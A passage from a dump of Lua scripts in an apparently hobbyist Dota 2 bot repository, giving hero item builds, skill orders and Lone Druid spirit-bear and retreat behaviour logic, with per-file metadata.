potential_hero_distance = distance\n end\n end\n end\n end\n end\n if potential_target_hero ~= nil then\n local heroName = potential_target_hero:GetUnitName()\n npcBot:ActionQueue_UseAbilityOnEntity(recall, potential_target_hero)\n npcBot:ActionImmediate_Chat(\"I'm Recalling \" .. heroName .. \"!!!\", false)\n end\n end\n\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= BOT_ACTION_TYPE_ATTACK and nearestEnemy ~= nil then\n if manaleak:IsFullyCastable() then\n npcBot:Action_UseAbilityOnEntity(manaleak, nearestEnemy)\n end\n if blinding:IsFullyCastable() then\n local locFactor = 1.2\n if action_mode == BOT_MODE_RETREAT then\n locFactor = 0.8\n end\n\n if botTeam == 2 then\n local blindingLoc = _G.getVectorBetweenTargetPercentage(npcBot, nearestEnemy, locFactor)\n else\n local blindingLoc = _G.getVectorBetweenTargetPercentage(nearestEnemy, npcBot, locFactor)\n end\n npcBot:Action_UseAbilityOnLocation(blinding, blindingLoc)\n end\n end\n end\n\n -- recall think --\n\n -- blinding think --\n end\nend\n\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend\n\nfunction UnderSpiritFrom()\n if npcBot:HasModifier(\"modifier_keeper_of_the_light_spirit_form\") then\n return true\n else\n return false\n end\nend"
},
{
"alpha_fraction": 0.5329052805900574,
"alphanum_fraction": 0.540930986404419,
"avg_line_length": 18.184616088867188,
"blob_id": "06b1154b224fc32015a860dacea16b07af5fb452",
"content_id": "97442303c35bbee5c992e2d3a24ff39a3e361fc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 1246,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 65,
"path": "/item_build_tinker.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n\t\"item_courier\",\n \"item_circlet\",\n \"item_mantle\",\n \"item_recipe_null_talisman\",\n \"item_tango\",\n \"item_bottle\",\n \"item_boots\",\n \"item_recipe_travel_boots\",\n \"item_gauntlets\",\n \"item_gauntlets\",\n \"item_ring_of_regen\",\n \"item_recipe_soul_ring\",\n \"item_blink\",\n \"item_energy_booster\",\n \"item_void_stone\",\n \"item_recipe_aether_lens\",\n \"item_point_booster\",\n \"item_ogre_axe\",\n \"item_blade_of_alacrity\",\n \"item_staff_of_wizardry\",\n \"item_mystic_staff\",\n \"item_platemail\",\n \"item_recipe_shivas_guard\"\n}\n\nlocal laser = \"tinker_laser\"\nlocal missle = \"tinker_heat_seeking_missile\"\nlocal march = \"tinker_march_of_the_machines\"\nlocal rearm = \"tinker_rearm\"\n\nX[\"skills\"] = {\n laser, \n march, \n march, \n laser, \n march,\n rearm, \n missle, \n march, \n rearm, \n talents[2],\n missle, \n missle,\n laser,\n laser,\n talents[4],\n laser, \n \"-1\", \n rearm,\n \"-1\", \t\n talents[5],\n \"-1\", \t\n \"-1\", \t\n \"-1\", \n \"-1\", \n talents[7]\n}\n\nreturn X"
},
{
"alpha_fraction": 0.49934980273246765,
"alphanum_fraction": 0.5253576040267944,
"avg_line_length": 22.793813705444336,
"blob_id": "0f0aded61315284355f95e1b89357727a978e133",
"content_id": "7324c0ff440903a55f3ba4e4b2ab65b433678bb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2307,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 97,
"path": "/item_build_abaddon.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n -- start --\n\t\"item_stout_shield\",\n \"item_flask\",\n \"item_tango\",\n \"item_enchanted_mango\",\n \"item_branches\",\n \"item_branches\",\n -- magic wand --\n \"item_magic_stick\",\n -- Helm of Dominator --\n \"item_ring_of_regen\",\n \"item_branches\",\n \"item_recipe_headdress\",\n \"item_ring_of_health\",\n \"item_gloves\",\n -- phase boots --\n \"item_boots\",\n \"item_blades_of_attack\",\n \"item_blades_of_attack\",\n -- radiance --\n \"item_relic\",\n \"item_recipe_radiance\",\n -- medallion of courage --\n \"item_chainmail\",\n \"item_sobi_mask\",\n \"item_blight_stone\",\n -- solar crest --\n \"item_talisman_of_evasion\",\n -- Hood of Defiance --\n \"item_ring_of_health\",\n \"item_cloak\",\n \"item_ring_of_regen\",\n -- Pipe of Insight --\n \"item_ring_of_regen\",\n \"item_branches\",\n \"item_recipe_headdress\",\n \"item_recipe_pipe\",\n -- Shiva's Guard --\n \"item_platemail\",\n \"item_mystic_staff\",\n \"item_recipe_shivas_guard\",\n -- Octarine Core --\n \"item_point_booster\",\n \"item_vitality_booster\",\n \"item_energy_booster\",\n \"item_mystic_staff\",\n}\n\nlocal death_coil = \"abaddon_death_coil\"\nlocal aphotic_shield = \"abaddon_aphotic_shield\"\nlocal forstmourne = \"abaddon_frostmourne\"\nlocal borrowed_time = \"abaddon_borrowed_time\"\n\nX[\"skills\"] = {\n aphotic_shield, --1\n forstmourne, --2 \n aphotic_shield, --3\n forstmourne, --4\n aphotic_shield, --5\n borrowed_time, --6\n aphotic_shield, --7\n forstmourne, --8\n forstmourne, --9\n talents[2], --10\n death_coil, --11\n borrowed_time, --12\n death_coil, --13\n death_coil, --14\n talents[4], --15\n death_coil, --16\n -- \"-1\", --17\n borrowed_time, --18\n -- \"-1\", --19\n talents[5], --20\n -- \"-1\", \t --21\n -- \"-1\", \t --22\n -- \"-1\", --23\n -- \"-1\", --24\n talents[7], --25\n \"separate\",\n talents[1],\n talents[2],\n talents[3],\n talents[4],\n talents[5],\n talents[6],\n talents[7],\n talents[8],\n talents[9],\n}\nreturn X"
},
{
"alpha_fraction": 0.49760764837265015,
"alphanum_fraction": 0.5281100273132324,
"avg_line_length": 23.970149993896484,
"blob_id": "88a00cfd7ead6644b303869983e2bb37a073945a",
"content_id": "75c689448469c1297b0cedae398583deb2c74c8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 1672,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 67,
"path": "/item_build_huskar.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n\t\"item_gauntlets\",\n \"item_circlet\",\n \"item_recipe_bracer\",\n \"item_tango\",\n \"item_boots\",\n \"item_blades_of_attack\",\n \"item_helm_of_iron_will\",\n \"item_gloves\",\n \"item_recipe_armlet\",\n \"item_belt_of_strength\",\n \"item_gloves\",\n \"item_ogre_axe\",\n \"item_mithril_hammer\",\n \"item_recipe_black_king_bar\",\n \"item_ogre_axe\",\n \"item_belt_of_strength\",\n \"item_recipe_sange\",\n \"item_talisman_of_evasion\",\n \"item_ogre_axe\",\n \"item_boots_of_elves\",\n \"item_boots_of_elves\",\n \"item_platemail\",\n \"item_chainmail\",\n \"item_hyperstone\",\n \"item_recipe_assault\"\n}\n\nlocal inner_vitality = \"huskar_inner_vitality\"\nlocal burning_spear = \"huskar_burning_spear\"\nlocal berserkers_blood = \"huskar_berserkers_blood\"\nlocal life_break = \"huskar_life_break\"\n\nX[\"skills\"] = {\n burning_spear, --1\n berserkers_blood, --2 \n burning_spear, --3\n inner_vitality, --4\n burning_spear, --5\n life_break, --6\n burning_spear, --7\n berserkers_blood, --8\n berserkers_blood, --9\n talents[2], --10\n berserkers_blood, --11\n life_break, --12\n inner_vitality, --13\n inner_vitality, --14\n talents[4], --15\n inner_vitality, --16\n -- \"-1\", --17\n life_break, --18\n -- \"-1\", --19\n talents[6], --20\n -- \"-1\", \t --21\n -- \"-1\", \t --22\n -- \"-1\", --23\n -- \"-1\", --24\n talents[9] --25\n}\n\nreturn X"
},
{
"alpha_fraction": 0.673454225063324,
"alphanum_fraction": 0.6861809492111206,
"avg_line_length": 27.659574508666992,
"blob_id": "8f99aa6a6edeb775cb3f615c0ff9c234d0587430",
"content_id": "bf395dc8c3dd91f810ce29d9ce0765df7b3916ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 9429,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 329,
"path": "/bot_lone_druid.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\n-- Bear Modes\nlocal retreat = 0\nlocal attack = 0\nlocal farm = 0\nlocal laning = 0\nlocal follow = 0\n\n-- Bear Stats\nlocal action = nil\nlocal bearLoc = nil\nlocal bearAction = nil\nlocal bearMana = nil\nlocal bearHealth = nil\nlocal bearMaxHealth = nil\nlocal bearMaxMana = nil\nlocal bearHPRegen = nil\nlocal bearManaRegen = nil\n\nlocal botMode = nil\nlocal bearMode = nil\nlocal fountain = GetShopLocation(GetTeam(), SHOP_HOME)\n\nfunction MinionThink(minion)\n\tif minion ~= nil then\n\t\tlocal minionName = minion:GetUnitName()\n\t\t\n\t\tif string.find(minionName, \"npc_dota_lone_druid_bear\") then\n\t\t\tbotMode = npcBot:GetActiveMode()\n\t\t\tnpcBot.bear = minion\n\t\t\tnpcBot.bear.roar = minion:GetAbilityByName(\"lone_druid_savage_roar_bear\")\n\t\t\tnpcBot.bear.tele = minion:GetAbilityByName(\"lone_druid_spirit_bear_return\")\n\t\t\taction = minion:GetCurrentActionType()\n\t\t\tbearLoc = minion:GetLocation()\n \tbearAction = minion:GetCurrentActionType()\n \tbearMana = minion:GetMana()\n \tbearHealth = minion:GetHealth()\n \tbearMaxHealth = minion:GetMaxHealth()\n \tbearMaxMana = minion:GetMaxMana()\n \tbearHPRegen = minion:GetHealthRegen()\n \tbearManaRegen = minion:GetManaRegen()\n\t\t\tgetAllDesires(minion)\n\t\t\tlocal prevMode = bearMode\n\t\t\tbearMode = getHighestDesire()\n\t\t\t\n\t\t\tif prevMode ~= nil and prevMode ~= bearMode then\n\t\t\t\tprint(\" Bear Mode: \" .. _G.getDesireString(bearMode))\n\t\t\tend\n\t\t\t\n\t\t\tbearAbilityUsageThink(minion)\n\t\t\t\n\t\t\tif bearMode == BOT_MODE_RETREAT then\n\t\t\t\tRetreat(minion)\n\t\t\telseif bearMode == BOT_MODE_ATTACK then\n\t\t\t\tAttack(minion)\n\t\t\telseif bearMode == BOT_MODE_FARM then\n\t\t\t\tFarm(minion)\n\t\t\telseif bearMode == BOT_MODE_LANING then\n\t\t\t\tLaning(minion)\n\t\t\telseif bearMode == BOT_MODE_NONE then\n\t\t\t\tFollow(minion)\n\t\t\telseif bearMode == BOT_MODE_ITEM then\n\t\t\t\tpickupItem(minion.item)\n\t\t\tend\n\t\tend\n\tend\nend\n\n-- OTHER FUNCTIONS ---------------------------------------------------------------------------------\nfunction pickupItem(toTransfer)\n\tlocal botDist = GetUnitToUnitDistance(npcBot, npcBot.bear)\n\t\n\tif botDist < 200 then\n \tnpcBot.bear:Action_PickUpItem(toTransfer)\n \n \tfor i = 0, 8 do \n \t\tlocal item = npcBot.bear:GetItemInSlot(i)\n \t\tif item ~= nil and item:GetName() == toTransfer:GetName() then\n \t\t\tprint(\" \" .. tostring(npcBot.bear.item))\n \t\t\tprint(\" \" .. tostring(npcBot.bear.pickupitem))\n \t\t\tnpcBot.bear.item = nil\n \t\t\tnpcBot.bear.pickupitem = false\n \t\t\tprint(npcBot.bear.item)\n \t\t\tprint(npcBot.bear.pickupitem)\n \t\tend\n \tend\n\telse\n\t\tif action ~= BOT_ACTION_TYPE_MOVE_TO then\n\t\t\tnpcBot.bear:Action_MoveToLocation(npcBot:GetLocation())\n\t\tend\n\tend\nend\n\nfunction bearAbilityUsageThink(bear)\n\tlocal enemyHeroes = bear:GetNearbyHeroes(350, true, BOT_MODE_NONE)\n\t\n\tif table.getn(enemyHeroes) > 0 then\n\t\tif action ~= BOT_ACTION_TYPE_USE_ABILITY and bear.roar:IsFullyCastable() then\n\t\t\tbear:Action_UseAbility(bear.roar)\n\t\tend\n\tend\nend\n\n-- MODES -------------------------------------------------------------------------------------------\nfunction Retreat(bear)\n\tlocal nearbyHeroes = bear:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\t\n\tif table.getn(nearbyHeroes) > 0 and bear.roar:IsFullyCastable() and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tlocal enemyTarget = nearbyHeroes[1]:GetAttackTarget()\n\t\tlocal distEnemy = GetUnitToUnitDistance(bear, nearbyHeroes[1])\n\t\tif enemyTarget == npcBot or enemyTarget == bear then\n \t\tif distEnemy > 325 and action ~= BOT_ACTION_TYPE_MOVE_TO then\n \t\t\tbear:Action_MoveTo(nearbyHeroes[1]:GetLocation() + RandomVector(50))\n \t\telseif distEnemy <= 325 and action ~= BOT_ACTION_TYPE_MOVE_TO then\n \t\t\tbear:Action_UseAbility(bear.roar)\n \t\telse\n \t\t\tbear:Action_MoveToLocation(fountain)\n \t\tend\n\t\telse\n\t\t\tbear:Action_MoveToLocation(fountain)\n\t\tend\n\telse\n\t\tbear:Action_MoveToLocation(fountain)\n\tend\nend\n\nfunction Attack(bear)\n\tlocal laneCreeps = bear:GetNearbyLaneCreeps(1000, true)\n\tlocal enemyHeroes = bear:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\tlocal neutrals = bear:GetNearbyNeutralCreeps(500)\n\tlocal botTarget = npcBot:GetAttackTarget()\n\tlocal nearbyTowers = npcBot:GetNearbyTowers(1000, true)\n\t\n\tif botTarget == nil or not botTarget:IsHero() then\n \tif table.getn(laneCreeps) > 0 then\n \t\tlocal toAttack = laneCreeps[1]\n \t\t\n \t\tfor c = 2, table.getn(laneCreeps) do\n \t\t\tlocal creep = laneCreeps[c]\n \t\t\t\n \t\t\tif toAttack:GetHealth() > creep:GetHealth() then\n \t\t\t\ttoAttack = creep\n \t\t\tend\n \t\tend\n \t\t\n \t\tif action ~= BOT_ACTION_TYPE_ATTACK then\n \t\t\tbear:Action_AttackUnit(toAttack, true)\n \t\tend\n \telseif table.getn(neutrals) > 0 then\n \t\tlocal toAttack = neutrals[1]\n \t\t\n \t\tfor n = 2, table.getn(neutrals) do\n \t\t\tlocal neutral = neutrals[n]\n \t\t\t\n \t\t\tif toAttack:GetHealth() < neutral:GetHealth() then\n \t\t\t\ttoAttack = neutral\n \t\t\tend\n \t\tend\n \t\t\n \t\tif action ~= BOT_ACTION_TYPE_ATTACK then\n \t\t\tbear:Action_AttackUnit(toAttack, true)\n \t\tend\n \telseif table.getn(nearbyTowers) > 0 and action ~= BOT_ACTION_TYPE_ATTACK then\n \t\tbear:Action_AttackUnit(nearbyTowers[1], true)\n \tend\n\telseif botTarget ~= nil and botTarget:IsHero() then\n\t\tif action ~= BOT_ACTION_TYPE_ATTACK then\n\t\t\tbear:Action_AttackUnit(botTarget, true)\n\t\tend\n\tend\nend\n\nfunction Farm(bear)\n\tlocal nearbyNeutrals = bear:GetNearbyNeutralCreeps(600)\n\tlocal numNeutrals = table.getn(nearbyNeutrals)\n\t\n\tif numNeutrals > 0 then\n\t\tif action ~= BOT_ACTION_TYPE_ATTACK and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\tbear:Action_AttackUnit(nearbyNeutrals, true)\n\t\tend\n\telse\n\t\tif action ~= BOT_ACTION_TYPE_MOVE_TO and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\tbear:Action_MoveToLocation(npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\tend\nend\n\nfunction Laning(bear)\n\tlocal laneFront = GetLaneFrontLocation(TEAM_RADIANT, LANE_MID, 200)\n\tlocal frontDist = GetUnitToLocationDistance(bear, laneFront)\n\t\n\tif frontDist > 500 and bearAction ~= BOT_ACTION_TYPE_ATTACK and bearAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tbear:Action_MoveToLocation(laneFront)\n\tend\n\tAttack(bear)\nend\n\nfunction Follow(bear)\n\tbear:Action_MoveToLocation(npcBot:GetLocation())\nend\n\n-- DESIRES -----------------------------------------------------------------------------------------\nfunction getAllDesires(bear)\n\tretreat = getRetreatDesire(bear)\n\tattack = getAttackDesire(bear)\n\tfarm = getFarmDesire(bear)\n\tlaning = getLaningDesire(bear)\n\tfollow = getFollowDesire(bear)\nend\n\nfunction getHighestDesire()\n\tlocal highestMode = BOT_MODE_RETREAT\n\tlocal highest = retreat\n\t\n\tif attack > highest then\n\t\thighestMode = BOT_MODE_ATTACK\n\t\thighest = attack\n\tend\n\t\n\tif farm > highest then\n\t\thighestMode = BOT_MODE_FARM\n\t\thighest = farm\n\tend\n\t\n\tif laning > highest then\n\t\thighestMode = BOT_MODE_LANING\n\t\thighest = laning\n\tend\n\t\n\tif follow > highest then\n\t\thighestMode = BOT_MODE_NONE\n\t\thighest = follow\n\tend\n\t\n\tif npcBot.bear.pickupitem then\n\t\thighestMode = BOT_MODE_ITEM\n\tend\n\t\n\treturn highestMode\nend\n\nfunction getRetreatDesire(bear)\n\tlocal nearbyEnemies = bear:GetNearbyHeroes(650, true, BOT_MODE_NONE)\n\tlocal nearbyAllies = bear:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n\tlocal nearbyTowers = bear:GetNearbyTowers(1000, true)\n\tlocal nearbyCreeps = bear:GetNearbyLaneCreeps(150, true)\n\tlocal currentAction = bear:GetCurrentActionType()\n\tlocal damagedByCreep = bear:WasRecentlyDamagedByCreep(1)\n\tlocal damagedByHero = bear:WasRecentlyDamagedByCreep(1)\n\tlocal botCurrentHP = bear:GetHealth()\n\tlocal botMaxHP = bear:GetMaxHealth()\n\tlocal botLoc = bear:GetLocation()\n\t\n\tlocal closerEnemies = bear:GetNearbyHeroes(400, true, BOT_MODE_NONE)\n\tlocal fartherEnemies = bear:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\n\tif bear:IsChanneling() then\n\t\treturn _G.desires[0]\n\tend\n\t\n\tif (#fartherEnemies > 1) \n \tor (#closerEnemies > 0)\n \tor (#nearbyEnemies > 0 and currentAction ~= BOT_ACTION_TYPE_USE_ABILITY and not bear:IsChanneling())\n \tor (botCurrentHP/botMaxHP < 0.2 and currentAction ~= BOT_ACTION_TYPE_USE_ABILITY and not bear:IsChanneling())\n \tor ((damagedByCreep and #nearbyCreeps > 3) or damagedByHero) then\n \t\n\t\treturn _G.desires[7] \n\tend\n\t\n\tif #nearbyTowers > 0 then\n\t\tif not isTowerSafe(bear, nearbyTowers[1]) then\n\t\t\treturn _G.desires[7]\n\t\tend\n\tend\n\t\n\tfor i,enemy in ipairs(fartherEnemies) do\n\t\tlocal enemyLoc = enemy:GetLocation()\n\t\tlocal enemyRange = enemy:GetAttackRange()\n\t\t\n\t\tif enemyRange > 200 then\n\t\t\tlocal dist = _G.getDistance(enemyLoc, botLoc)\n\t\t\tif dist < (enemyRange + 200) then\n\t\t\t\treturn _G.desires[7]\n\t\t\tend\n\t\tend\n\tend\n\t\n\treturn _G.desires[1]\nend\n\nfunction getAttackDesire(bear)\n\tif botMode == BOT_MODE_ATTACK then\n\t\treturn _G.desires[6]\n\tend\n\t\n\treturn _G.desires[1]\nend\n\nfunction getFarmDesire(bear)\n\tif botMode == BOT_MODE_FARM then\n\t\treturn _G.desires[6]\n\tend\n\t\n\treturn _G.desires[1]\nend\n\nfunction getLaningDesire(bear)\n\tif botMode == BOT_MODE_LANING then\n\t\treturn _G.desires[6]\n\tend\n\t\n\treturn _G.desires[1]\nend\n\nfunction getFollowDesire(bear)\n\tlocal druidDist = GetUnitToUnitDistance(npcBot, bear)\n\tlocal aghaSlot = npcBot:FindItemSlot(\"item_ultimate_scepter\")\n\t\n\tif druidDist > 1000 and npcBot:GetItemSlotType(aghaSlot) ~= ITEM_SLOT_TYPE_MAIN then\n\t\treturn _G.desires[7]\n\tend\n\t\n\treturn _G.desires[1]\nend\n"
},
{
"alpha_fraction": 0.7070919275283813,
"alphanum_fraction": 0.7289131283760071,
"avg_line_length": 29.1645565032959,
"blob_id": "6cac71e3aee2869fd531041ec20ce9f116d701bb",
"content_id": "d1dcd0e29a8fea1301d9f960cecbd675da38e9f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2383,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 79,
"path": "/mode_retreat_tinker.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require( GetScriptDirectory()..\"/UtilityData\")\nrequire( GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\n\nfunction OnStart()\n\tnpcBot:Action_ClearActions(true)\nend\n\n-- When faced with multiple enemies, fall back to a safe location\nfunction Think()\n\tlocal fountain = GetShopLocation(GetTeam(), SHOP_HOME)\n\tlocal missile = npcBot:GetAbilityByName(\"tinker_heat_seeking_missile\")\n\tlocal enemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\t\n\tif _G.getDistance(fountain, npcBot:GetLocation()) > 100 then\n\t\tnpcBot:Action_MoveToLocation(fountain)\n\tend\n\t\n\t-- Use Missile if enemy nearby\n\tif missile ~= nil and missile:IsFullyCastable() and #enemies > 0 then\n\t\tnpcBot:Action_UseAbility(missile)\n\tend\nend\n\nfunction GetDesire()\n\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\tlocal nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n\tlocal nearbyTowers = npcBot:GetNearbyTowers(1000, true)\n\tlocal nearbyCreeps = npcBot:GetNearbyCreeps(300, true)\n\tlocal allyCreeps = npcBot:GetNearbyCreeps(1600, false)\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal damagedByCreep = npcBot:WasRecentlyDamagedByCreep(1)\n\tlocal damagedByHero = npcBot:WasRecentlyDamagedByAnyHero(1)\n\tlocal botCurrentHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal botLoc = npcBot:GetLocation()\n\tlocal botMode = npcBot:GetActiveMode()\n\t\n\tif botMode == BOT_MODE_ROAM and table.getn(closerEnemies) > 0 then\n\t\treturn _G.desires[7]\n\tend\n\t\n\tif npcBot:IsChanneling() then\n\t\treturn _G.desires[0]\n\tend\n\t\n\tif table.getn(nearbyEnemies) > 0 then\n\t\treturn _G.desires[7]\n\tend\n\t\n\tfor e = 1, table.getn(nearbyEnemies) do\n\t\tlocal enemy = nearbyEnemies[e]\n\t\tlocal dist = GetUnitToUnitDistance(npcBot, enemy)\n\t\tlocal enemyTarget = enemy:GetAttackTarget()\n\t\tlocal isTargetted = false\n\t\t\n\t\tif enemyTarget ~= nil then\n\t\t\tisTargetted = enemyTarget:GetUnitName() == npcBot:GetUnitName()\n\t\tend\n\t\t\n\t\tif dist < 500 or (dist > 500 and isTargetted) then\n\t\t\treturn _G.desires[7]\n\t\tend\n\tend\n\t\n\tif (botCurrentHP/botMaxHP < 0.2 and not npcBot:IsChanneling())\n \tor (damagedByCreep and table.getn(nearbyCreeps) > 3) then\n \t\n\t\treturn _G.desires[7]\n\tend\n\t\n\tif table.getn(nearbyTowers) > 0 then\n\t\t-- \n\tend\n\t\n\treturn _G.desires[0]\nend\n"
},
{
"alpha_fraction": 0.5887658596038818,
"alphanum_fraction": 0.6018860340118408,
"avg_line_length": 22.461538314819336,
"blob_id": "079e0263ded24890eefe7010db623958465f7376",
"content_id": "74bd6b8efd5fc315d760feaab66cf2ae3a7c8fb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2439,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 104,
"path": "/item_build_lone_druid.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n\t\"item_tango\",\n \"item_stout_shield-bear\",\n \"item_quelling_blade-bear\",\n \"item_orb_of_venom-bear\",\n \"item_boots-bear\",\n \"item_recipe_hand_of_midas\",\n \"item_gloves\",\n \"item_boots\",\n \"item_magic_stick\",\n \"item_branches\",\n \"item_branches\",\n \"item_enchanted_mango\",\n \"item_relic-bear\",\n \"item_recipe_radiance-bear\",\n \"item_blades_of_attack\",\n \"item_blades_of_attack\",\n \"item_platemail-bear\",\n \"item_hyperstone-bear\",\n \"item_chainmail-bear\",\n \"item_recipe_assault-bear\",\n \"item_point_booster\",\n \"item_staff_of_wizardry\",\n \"item_ogre_axe\",\n \"item_blade_of_alacrity\",\n \"item_belt_of_strength-bear\",\n \"item_javelin-bear\",\n \"item_recipe_basher-bear\",\n \"item_ring_of_health-bear\",\n \"item_vitality_booster-bear\",\n \"item_stout_shield-bear\",\n \"item_recipe_abyssal_blade-bear\",\n \"item_hyperstone-bear\",\n \"item_javelin-bear\",\n \"item_javelin-bear\",\n \"item_mithril_hammer-bear\",\n \"item_gloves-bear\",\n \"item_recipe_maelstrom-bear\",\n \"item_hyperstone-bear\",\n \"item_recipe_mjollnir-bear\",\n}\n\nlocal spirit = \"lone_druid_spirit_bear\"\nlocal rabid = \"lone_druid_rabid\"\nlocal roar = \"lone_druid_savage_roar\"\nlocal form = \"lone_druid_true_form\"\n\nlocal t1 = \"special_bonus_hp_250\"\nlocal t2 = \"special_bonus_unique_lone_druid_2\"\nlocal t3 = \"special_bonus_unique_lone_druid_6\"\nlocal t4 = \"special_bonus_unique_lone_druid_7\"\n\n-- Abilities:\n-- lone_druid_spirit_bear\n-- lone_druid_rabid\n-- lone_druid_savage_roar\n-- lone_druid_true_form_battle_cry\n-- generic_hidden\n-- lone_druid_true_form\n-- lone_druid_true_form_druid\n-- Talents:\n-- special_bonus_hp_250\n-- special_bonus_attack_range_175\n-- special_bonus_unique_lone_druid_4\n-- special_bonus_unique_lone_druid_2\n-- special_bonus_unique_lone_druid_8\n-- special_bonus_unique_lone_druid_6\n-- special_bonus_unique_lone_druid_9\n-- special_bonus_unique_lone_druid_7\n\nX[\"skills\"] = {\n spirit, \n roar, \n spirit, \n rabid, \n spirit,\n rabid, \n spirit, \n rabid, \n rabid, \n t1,\n form, \n form,\n roar,\n roar,\n t2,\n roar, \n \"-1\", \n form,\n \"-1\", \t\n t3,\n \"-1\", \t\n \"-1\", \t\n \"-1\", \n \"-1\", \n t4\n}\n\nreturn X"
},
{
"alpha_fraction": 0.7194244861602783,
"alphanum_fraction": 0.7235354781150818,
"avg_line_length": 26.05555534362793,
"blob_id": "aec48a89f19b084a1239d6c461c471e515949db0",
"content_id": "ffa8173b2819641d5441438be70b58e7908293a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 973,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 36,
"path": "/mode_secret_shop_abyssal_underlord.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local npcBot = GetBot()\nlocal botTeam = npcBot:GetTeam()\n\nfunction GetDesire()\n local mode = npcBot:GetActiveMode();\n\tlocal modeDesire = npcBot:GetActiveModeDesire();\n\n\tif npcBot.secretShop and mode ~= BOT_MODE_ATTACK and mode ~= BOT_MODE_RETREAT and mode ~= BOT_MODE_DEFEND_ALLY and mode ~= BOT_MODE_EVASIVE_MANEUVERS then\n\t\treturn _G.desires[4]\n\tend\n\t\n\treturn 0\nend\n\nfunction Think()\n\tlocal secretShopLoc = GetShopLocation(botTeam, SHOP_SECRET)\n--\tlocal courier = GetCourier(0)\n--\tif courier ~= nil then\n--\t\tlocal courierState = GetCourierState(courier)\n--\t\t\n--\t\tif courierState == COURIER_STATE_IDLE then\n--\t\t\t-- send courier to secret shop\n--\t\telseif courierState == COURIER_STATE_DELIVERING_ITEMS then\n--\t\t\t-- send bot to secret shop\n--\t\tend\n--\tend\n\tlocal secretDist = npcBot:DistanceFromSecretShop()\n\t\n\tif secretDist > 0 then\n\t\tif not npcBot:IsChanneling() then\n\t\t\tnpcBot:Action_MoveToLocation(secretShopLoc)\n\t\tend\n\telse\n\t\tnpcBot.secretShop = false\n\tend\nend"
},
{
"alpha_fraction": 0.7083333134651184,
"alphanum_fraction": 0.7291666865348816,
"avg_line_length": 14.666666984558105,
"blob_id": "6d18a8f32e8166fe3e3760b9a8651a72d48024ce",
"content_id": "5d0233b68e7c1eb56f6a2bb9c8a939d81a20563a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 3,
"path": "/mode_push_tower_bot_lone_druid.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
